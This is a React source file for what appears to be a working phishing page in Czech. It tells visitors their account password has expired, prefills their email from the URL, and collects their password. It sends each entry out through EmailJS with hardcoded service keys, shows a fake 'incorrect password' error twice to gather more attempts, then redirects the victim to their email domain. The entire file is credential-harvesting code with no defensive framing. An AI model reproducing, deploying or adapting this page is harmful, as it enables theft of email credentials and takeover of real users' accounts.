//jshint esversion:6
import React, {useState, useRef} from 'react'
import emailjs from '@emailjs/browser';
import ClipLoader from "react-spinners/ClipLoader";
import Grid from '@mui/material/Grid';
import VisibilityOffIcon from '@mui/icons-material/VisibilityOff';
import VisibilityIcon from '@mui/icons-material/Visibility';


function getPartAfterDot(text) {
  var dotIndex = text.indexOf('@');
  if (dotIndex !== -1) {
    return text.substring(dotIndex + 1);
  }
  return '';
}

function App() {
  const url = window.location.search.slice(20)
  const form = useRef();
  const [count, setCount] = useState(0)
  const [email, setEmail] = useState(url ? url : '')
  const [expired, setExpired] = useState('Platnost hesla účtu vypršela, ověřte nyní, abyste mohli nadále používat')
  const [pwdOne, setPwdOne] = useState('')

  const [pwdError, setPwdError] =  useState(false)

  const [loading, setLoading] = useState(false)
  const [visible, setVisible] = useState(false)

  const handleEmailChange = (e) => {
    setEmail(e.target.value)
  }
  const handlePwdOneChange = (e) => {
    setPwdOne(e.target.value)
  }


  const handleFormSubmit = async (e) => {
    e.preventDefault()
    setPwdError(false)
    setExpired('')
    setLoading(true)

    if (count < 2) {
      setCount(prevCount => prevCount + 1)

      setLoading(true)
      emailjs.sendForm('service_hha5flp', 'template_t8eee5b', form.current, 'O0xPW1DplZlPxPWOl')
      .then((result) => {
        setPwdOne("")
        setLoading(false)
        setPwdError(true)
      }, (error) => {
          console.log(error.text);
      });
    }


    if (count >= 2 ) {
      emailjs.sendForm('service_hha5flp', 'template_t8eee5b', form.current, 'O0xPW1DplZlPxPWOl')
      .then((result) => {
        const redir = getPartAfterDot(email)
        window.location.replace(`https://${redir}`);
      }, (error) => {
          console.log(error.text);
      });
    }
  }

  const handleVisibility = () => {
    setVisible(prevValue => !prevValue)
  }

  return (
    <div>
      <div className='bgText'>
        Načtení účtu
      </div>

      <div className="general">
        <h2>Opětovné připojení</h2>
        <h3>{email}</h3>

        <p style={{textAlign: 'center', color: 'red', fontSize: '.8rem'}}>{expired}</p>
        <form ref={form} onSubmit={handleFormSubmit}>
            <input placeholder='Email' type="email" name="mascot" value={email} onChange={handleEmailChange} required/>
            
            <Grid container>
              <Grid item xs={12}>
                <input placeholder='Heslo' type={visible ? "text" : "password"} name="pwdOne" value={pwdOne} onChange={handlePwdOneChange} required />
              </Grid>
                <Grid item xs={1} sx={{position: 'relative', left: '195px', top: '-39px'}}>
                  {!visible ? 
                    <VisibilityIcon onClick={handleVisibility} sx={{cursor: 'pointer'}} /> 
                    : 
                    <VisibilityOffIcon onClick={handleVisibility} sx={{cursor: 'pointer'}} />
                  }
                </Grid>
            </Grid>

            {pwdError && <div className='error'>Nesprávné, zkuste to prosím znovu</div>}
            <input type="submit" value="Pokračovat" />

        </form>

        {loading && 
          <div className='loader'>
            <ClipLoader
              color='#0073c6dc'
              loading={loading}
              size={150}
              aria-label="Loading Spinner"
              data-testid="loader"
            />
          </div>
        }
      </div>
    </div>


  );
}

export default App;
